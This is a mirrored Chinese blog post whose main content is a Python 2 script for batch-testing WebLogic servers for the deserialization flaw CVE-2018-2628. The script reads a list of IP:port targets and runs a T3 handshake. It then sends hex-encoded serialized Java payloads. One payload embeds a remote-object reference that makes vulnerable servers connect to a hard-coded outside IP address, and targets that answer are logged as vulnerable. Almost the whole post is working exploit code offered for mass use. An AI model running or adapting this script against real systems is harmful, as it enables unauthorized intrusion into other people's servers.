zoukankan      html  css  js  c++  java
  • weblogic反序列化漏洞CVE-2018-2628-批量检测脚本

    #coding=utf-8
    
    import socket
    import time
    import re,os,sys,codecs
    
    type = 'utf-8'
    reload(sys)
    sys.setdefaultencoding(type)
    IpFile=file('./weblogic1.txt') #IP列表
    fp= codecs.open("./weblogic1_success.txt","a") #成功利用后写入的文件,支持写入中文字符的方式
    timeout=15
    
    
    VUL=['CVE-2018-2628']
    PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
    VER_SIG=['\$Proxy[0-9]+']
    
    def t3handshake(sock,server_addr):
        print '
    [*]正在连接服务器...'.decode(type)
        sock.connect(server_addr)
        sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
        time.sleep(1)
        sock.recv(1024)
    
    
    def buildT3RequestObject(sock,port,server_addr):
        print '%s:%d连接成功,正在发送请求...'.decode(type) %(server_addr[0],server_addr[1])
        data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
        data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
        data3 = '1a7727000d3234322e323134'
        data4 = '2e312e32353461863d1d0000000078'
        for d in [data1,data2,data3,data4]:
            sock.send(d.decode('hex'))
        time.sleep(2)
        date = len(sock.recv(2048))
        print '发送有效载荷请求成功,接收长度:%d'.decode(type) %(date)
        return date
    
    def sendEvilObjData(sock,data):
        print '正在执行payload,请稍等...'.decode(type)
        payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
        payload+=data
        payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
        payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
        sock.send(payload.decode('hex'))
        time.sleep(2)
        sock.send(payload.decode('hex'))
        res = ''
        try:
            while True:
                res += sock.recv(4096)
                time.sleep(0.1)
        except Exception as e:
            pass
        return res
    
    def checkVul(res,server_addr,index):
        print '执行结果:'.decode(type)
        p=re.findall(VER_SIG[index], res, re.S)
        if len(p)>0:
            info='%s:%d 存在 %s 漏洞.' %(server_addr[0],server_addr[1],VUL[index])
            info=info.decode(type)
            print info
            info=info+"
    "
            fp.write(info)
            fp.flush() 
        else:
            print '%s:%d 不存在 %s 漏洞'.decode(type) % (server_addr[0],server_addr[1],VUL[index])
    
    
    def check(host,port,index):
        dip=host
        global dport
        dport=port
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        server_addr = (dip, dport)
        try:
            t3handshake(sock,server_addr)
        except Exception as e:
            print '%s:%d连接失败,请检查IP是否存活...'.decode(type) %(server_addr[0],server_addr[1])
        else:
            try:
                dateout = buildT3RequestObject(sock,dport,server_addr)
                if dateout == 0:
                    print '%s:%d 不存在 %s 漏洞.'.decode(type) % (server_addr[0],server_addr[1],VUL[index])
                else:
                    rs=sendEvilObjData(sock,PAYLOAD[index])
                    # print 'rs',rs
                    checkVul(rs,server_addr,index)
            except Exception as e:
                print '%s:%d请求频繁,请稍后自行单独测试...'.decode(type) %(server_addr[0],server_addr[1])
        finally:
            sock.close()
    
    
    if __name__=="__main__":
        ip_list = []
    
        print u'''
        ----------------------------------------------------------------------------------------
            程序名称:weblogic反序列化漏洞批量测试 CVE-2018-2628 weblogic_poc-cve-2018-2628.py
            程序作者:pt007@vip.sina.com
            程序用法:
        	weblogic1.txt里面设置需要扫描的IP地址,如:10.110.123.30:7001 回车后输入下一个IP地址!
        	python weblogic_poc-cve-2018-2628.py
        -----------------------------------------------------------------------------------------
    '''
        ip_list=[]
        print "[*]weblogic url list:",
        while True:
            line = IpFile.readline()
            if len(line) == 0: # Zero length indicates EOF
                break
                #exit()             
            line=line.strip()
            print line,
            ip_list.append(line)
        IpFile.close()
        print "
    "
        for i in ip_list:
            host,port=i.split(":")
            check(host,int(port),0)
        fp.close()
        print "[*]Test done,please type weblogic1_success.txt!
    "
  • 相关阅读:
    2、容器初探
    3、二叉树:先序,中序,后序循环遍历详解
    Hebbian Learning Rule
    论文笔记 Weakly-Supervised Spatial Context Networks
    在Caffe添加Python layer详细步骤
    论文笔记 Learning to Compare Image Patches via Convolutional Neural Networks
    Deconvolution 反卷积理解
    论文笔记 Feature Pyramid Networks for Object Detection
    Caffe2 初识
    论文笔记 Densely Connected Convolutional Networks
  • 原文地址:https://www.cnblogs.com/hookjoy/p/8904276.html
Copyright © 2011-2022 走看看